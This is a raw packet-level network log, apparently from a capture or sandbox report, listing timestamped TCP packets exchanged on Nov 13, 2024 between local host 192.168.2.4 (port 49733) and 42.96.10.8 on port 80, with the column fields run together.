                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458929062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458956957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458971977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458981037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458995104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.458998919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459016085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459031105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459047079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459063053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459075928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459091902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459091902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459158897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459173918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459189892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459201097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459204912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459224939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459228039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459239960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459273100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459281921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459297895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459326982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459345102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459366083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459366083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459382057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459383965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459400892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459435940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459440947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459469080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459485054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459501982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459517002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459532022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459593058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459610939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459628105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459640980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459644079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459661961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459682941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459714890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459717989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459733009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459749937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459765911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459781885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459835052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459850073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459867001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459882975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459897995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459914923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459923029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459952116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459980965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.459984064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460011959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460027933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460042953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460058928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460083008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460083008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460149050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460165977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460181952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460230112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460284948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460304022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460319042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460334063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460350990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460357904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460377932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460395098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460397959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460412979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460429907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460433006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460447073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460465908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460477114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460506916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460521936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460540056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460555077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460572004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460608959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460627079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460642099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460655928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460659981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460680008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460726023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460741997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460758924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460776091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460788012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460788012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460793018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460815907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460845947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460858107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460882902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460899115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460899115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460917950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460933924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460948944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460958004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460969925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460972071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460972071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.460983038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.461024046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501633883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501669884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501697063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501712084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501728058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501743078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501758099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501758099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501759052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501775980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501792908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501807928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.501826048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.504175901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.504251003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.541979074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.542001009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.542105913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.544400930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.544416904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.544471025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.554361105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.554378033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.554393053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.554421902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555211067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555236101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555242062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555253983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555279016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555294037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555308104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555331945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555332899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555332899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.555406094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.573740959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.573900938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.573916912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.573926926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.573956013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.573971033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.573991060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574016094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574031115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574032068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574043036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574047089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574055910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574064970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574079990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574095011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574110985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574122906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574122906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574151993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574170113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574174881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574184895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574225903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574240923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574253082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574255943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574287891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574322939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574337959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574352026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574363947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574368954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574407101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574419022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574434996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574465036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574507952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574518919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574523926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574538946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574551105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574564934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574579000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574579954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574594021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574616909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574618101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574650049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574652910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574667931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574681997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574692965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574697018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574712992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574728012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574744940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574744940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574758053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574763060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574770927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574779034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574820042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574830055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574846029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574861050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574878931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574906111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574906111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574928045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574944973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574959993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.574989080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575026989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575040102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575052977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575068951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575083017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575094938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575094938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575109959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575159073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575175047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575186968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575201988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575215101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575217962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575232983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575253010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575253010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575284004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575299025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575320959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575336933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575347900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575351954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575378895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575412989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575428009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575443029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575531006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575546026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575561047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575562000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575562000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575577021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575593948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575603962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575603962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575612068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575628042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575644016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575656891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575659037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575690985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575721979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575737953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575752020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575767994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575769901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575807095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575828075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575844049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575858116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575871944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575884104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575884104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575978994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.575994015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576009035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576020956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576023102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.576039076 CET804973342.96.10.8192.168.2.4
